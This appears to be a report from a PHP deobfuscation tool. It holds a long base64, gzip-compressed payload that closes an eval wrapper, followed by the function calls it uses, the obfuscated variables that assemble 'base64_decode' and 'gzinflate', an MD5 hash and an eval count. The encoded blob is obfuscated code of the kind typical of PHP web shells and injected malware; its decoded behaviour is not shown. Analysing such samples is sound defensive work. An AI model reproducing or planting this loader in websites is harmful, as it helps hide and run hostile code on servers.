KH12aZGgZqJGE7F2qmYkryOYQwrI1emZqiE1ytJNirWbofroTPGybPsRQC93Q4jji2L7ToAsCwASmGsxcrZlGK4uiPq07nx4qB8FqMR4tnEqZpAseuYRb4BgK+2obdUovAFHJ1U35ZO6mdxn1viF0Baw3XO4jagFL+AAcEiYHx61yIdv4eLZ7S7eLwa6BVeiRC52DAVc5LXHcMiWOklbMdqcfpBQxJhGwicvOZ8HKMF19YIMRPQv3ATBgSLbUK1a2lRnvDk0hPVvts0VewQ0THUGhaIc110QocYhqgptJyEjPktIWXO9853M1LKnyBQT3efALEZ5nAe1z6mG9I+sVa9XPujXDuL1/drxx8brcPjk/JpqVKOX4wXMyFIHkmidBOc8XPVm1hYfB72EbaF9U7hZWnPESlLux9G0/x7jWIK4KPA7y2qM3nhXI1iFog3NPhyDjUGrwC5xKME2m/WTqrAG7XyYblWrqHiLpIYBYAAYhLAHGyf3+2wenJS/XxS3S81jqunrDfTr6kQmEazdtqolU7rhwJatP1do/HxXbl0INrEGqR3hu3soPB00pjnd1AfhDyNNXpJWEvT7FpYJelj3SaALUnXyDeXgAOwg3K83SZWutSFvdxBFeM71TSc2ZCzKPGZgoEc2ui0gXJZOVtAn6ufN9eTqGSaGvlM2h+ok9lY25LXNlHiw7tG5SSFNNon6IgofSOJ9nuWMSCZ9S05K+c38pvy1hqq4w62qDeKTa6yWfkySopCTCg45MrJ9JyBlsIwD1UwwylzxWpeXU3WDrTCt2JWfp2iA9wlmSFpm96v2NS7qd8yv/H27fEE6ROsd13osYOomj4+SBE93ayPe33xyUPU9GewdTtgpQcy6GPLoKqscJyk5Hh/mqAySkdloBFjhKemn7+K/Wa9Ua3Uyp+a5bpYyVG5EW6vVj8cl9+XBLt6/p3Pr+D+hLo2jivlapMDyWVTCPifiwiIA4hBSzBgTElxqeDi4gsRE1Vo8QcommETUY5RlQmUZ9XjVC1KA9wHL1GlnQ6xgPMcOiCWhGxnpJGipFLoi0c7SDd0UpCQRbSipBsdQ9OMoYR6YDOLUjwVl5BDHTbgwBjqmoFVaTeeillsRkWNyHZ8UkLjMizKk211Jdwr4X7xws18lYeSblWINxcQS50QcHVSwlmF76JaasST9yIrcLXN230HbFJ5MKImcxvAwscYo7A4801795QM0YnRpfqbTHv3XH/DDPyuBPJrytKbjCgVfsQtGX2uVyxrw6m8z7e3P767NPMd0zpuZLcqR0cbRy2ibIO45SvaUXn9G+mOSobwStgSi3EZKEF04XSwmmTE7QjFfdfh+HkcKHh18Ysgmh63QZnXQ5wI9Y8dIKIY7JbBiH5uAXlhUoiwGHqeT9XGNtlc9z0s6cvodeckt33J/x01R5X9R/g53L583zgezvr5MtrWKuWyVvla8n7ezl9HCM7M9R4yPLZDsEqz4XI4b99G1jBvTO62tfu0u3XO4af6EjSYOX4JmtxKI0bbw6XouejHx3Upmgmch58+FYtS0k/AcL70M0ycL9cvZAmJP//9939QwwABqRGF9FCZpQKow6vFH4gAU+siD+WFvzlRCsEDPpdewZAn/u8VW1t+5mI8AcwzRBku+yBzqD0CfHZQSetQrKNq38EdapHvWCA6llnpVQjpRZAPuVcFtAHInTbXj9iwZcwnMfrO/SEfEK56+Zq9ti1oa+qO20cN1zEsijVkUw33+li/2yRbYw7w/yg97KC24aDfG6B1a+SK/X7Xxc+Am2gQjYCXNUimSg52wXTjB4F7iBXSBlsNdn+Ex9VLwv2p3DpXkJhg7rsWc+mRb+12AsPHAARJ4dAoRpwj4iARnsuR3HHMFdmeYjjZEqqO5p7G5rHB3JEqWOAeCRJDoYSsNz69O3Aqdhf9EgVTZplzwbWRfrIUgEAFRDsJbrLfjKFdgpmfQOzc8vJVpUsMrN7WGIIRSnjEnKaJN5Sn08M0CfJ13qwicTFv3gMIolKgHnkih9Ojzj2iyBoY4vDPDdFsMgOFUwMtwoJRw18QVgdUD+iavPY+DuxjB/7qqMSax0oB+Hlq5FhqONeJOW4mF1ZzdR2ogyqY6iXwuC6pM5pP3QH0OnR5Yv8m7KS2sdJXDQPgAokc5qgNRkBSj+VYHgygDCnLTfo9FPCFkGT3KYQrel/aQcxNciHQDJK3HATfGlbPbFnbIrhf8IZ69TDSBzI11G8IjVVJB7uas9R0d4EbIYeIGx48ScaH+GnwFxpCA8MKLFiq/m8X4EZwW2WWVpmlpTNLK7l4zkmZyLe1r6+/bmoyAGYf2Cw1Gf3wCvvx8J9Hnl7zczxWiv8nKH5B+afW+wvVOEQXC/S3zzJ3V98hZnuJrL1S3ksr7/sz98PobtVkZJypt9kRL/Vvobk5Jivd/VN0t6D9U2vvNxg9vOPO8kknLDZf5LiPOe4+qj/ErS9TOlbq/w7q//7y8TAGoO9sbG9kza/fs7OsAEvq8KzQyzcDPiqyTpyVIXhqQxBQ/ydYggl976l7RcO2XZTajo7gJ227QE/bBmWPrS5xilKrrWHQ9fPNwq5vDxZYgzDj3d0eTLDtSxWUlU1Y2ib8kKg8hVGwCNYgbvFswpTyj12JLx3+EXqJwfCOd8+wHgtNRXDqZiB3vO+b/EjPkwgDsC1D5yx/sTIZT2QyqK6Sq1uZP1m4zUrMMBITNoIx3keD3xcKmCsebLQch8LYfnQMa8CDCfDVhlPBg2dMvOPkIlwYEKdnqMIqxDqUaKodMHjcEleEGCbjOahuug7/ElmUelRViS4hHQ+gJLpL6BJrLvHsDoecilNzaSjUnAnBAUboYm1pMF7/mbBUckkVsjQo0X0OXvk7IJafCWN50symjO22B9SJAhGjRYs/2i9NgWDKTp3SdozphMa73fizviv19nLV28dqPazfWHF6W1jt4XH55KDOIQtFMdc7uK9WHDsEM/2BSXdgljcw5OeSYW5vUzyXIJwsZN+g5voDC63+wvhwgSQsEIRlsiAMAXlgtOnK452UhIWCsMDML8gQcspzvv5hsz4V+Xkx3nAt3XYdBxiV/QaaWuIGXfU/xIdzfdFwz8v0TelyFsRF1fhtKb0Qc604+W/DydPJvEWsfD9dzC5AhHQtCw0V5SUrWx7cKsqKP59W0wrGeSBVOxnWuLAdVF3a6xbd57j/7OY/se07BAHeiJnw2LbozvIr491nQgIjQSxiLR+7if4zYXWZbC8feYnus+mlsgOk7h3I5Q1YOvDxYPkJU25JJbRkOMQtrRiT82eZNqh+rtRTDRnAl6XBZLNnxpewtDxeWumtF6i3HiFSWl7fPYg9Dg5FB5/IgHnpdOzvZf39xgWZ/+l85xN9Dvawkelj3RI+obp7VUAlwURoi110rRiOgY5QYj2J3rpUUzOnH9/X8xvy67V0bj2dy971DuxmXs7Ka/lsXt5eB+Bt8Mv+v64SPxci/+DpEZ8Z7/MlhAtaaixzTP6uIqLpSXrQ6jf6hi8QxJBQMMvEv9BkJDBuKbBnV8F4Biki9gsAyLFgqFjk88gJrlTASgX8NBUwHVT/oA4INIAv/9PSH3prgAtk5GOnfy3Kt+7TR10UPM/W42d2BMbDxfMmVk7s0x6B8akvGHkOx2LBr5h/v8cTvIonv9/zblDBOgbGJrTL4nxZGmoyXYMFU3si8C5K8o9E6TgpS79y0GFAXgjIqmcPKbI3DycSB+ihMgcYdvBhcwcc4gNlDzgsTpqlQc0lJEB6sEyEWNc45pdAlr66juDPeUF6mMGigfoS55o4u6603YvWdo8YtC+lJO9+yIm9c8newWG9vXv5HazZBO2It0lR+D3MiPk/jFxdFq+37oIvBBLDrpuz84b8gVM6SHRAGOxEvXFwfMouQsfYqzzgdA177ONoDkbTTsJ/J/Usd8FusuuupomG8BXp8URAGZk/6cqfwKjzM4rnul+3xV7Y0V+9Ci7ZT41i7zqIRy2jo/xr74FUiOd1vQvuwe11SaxKCp4CkM4tbwRRxaV4/078Db+tr6PdIqNI8GYBLGaXPxeA3ho28CUbspkVQ0I3xcMUr4dvDD4ewUMXE58PvfminprckYs+j0nw0ETPieR8WU9L9JOJc/WPR/XoCf7nQ3Z/XU/M7BPJ2kfk9shM6NdfJxLFP3snUEgC/DdH5mxFeCP858vfExWjDaRCvNxHLn9+CfwZo9NBA/aslElsPMQOf+ZcvJay4b3n8hC72IzG5I+3iZHg/xntmLeul7JhwSs51yG6i3fY/Gd3fmcPEImd0+dsHSwmciztz18uqU0ddhyN6kmxYZEOwasU4y6xiaPpSLTw1+J5m/9qU8Tv8x544ts5Ocn4/tx9ZokY39unEXe07zdJ4OncNkX43sd9ponatFuRCaXD74NPVLXeMlE4Ur3HRBE9E54n8pwVk2YI3FgeD+mGg2zXZP97DKL+4r1ulk36EnGD9nb/Bw==')));?>

Function Calls

gzinflate 1
base64_decode 1

Variables

$b t
$c z
$e 6
$o n
$p l
$y f
$Ol base64_decode
$Qw d
$gb a
$oF o
$CPF i
$Doe c
$gpmJ gzinflate
$leHY g
$upQW 4
$AQAZd b
$csCfh s
$rNonj _
$suWac e

Stats

MD5 7188dda303b8688f6e5ddf6aae05a654
Eval Count 1
Decode Time 122 ms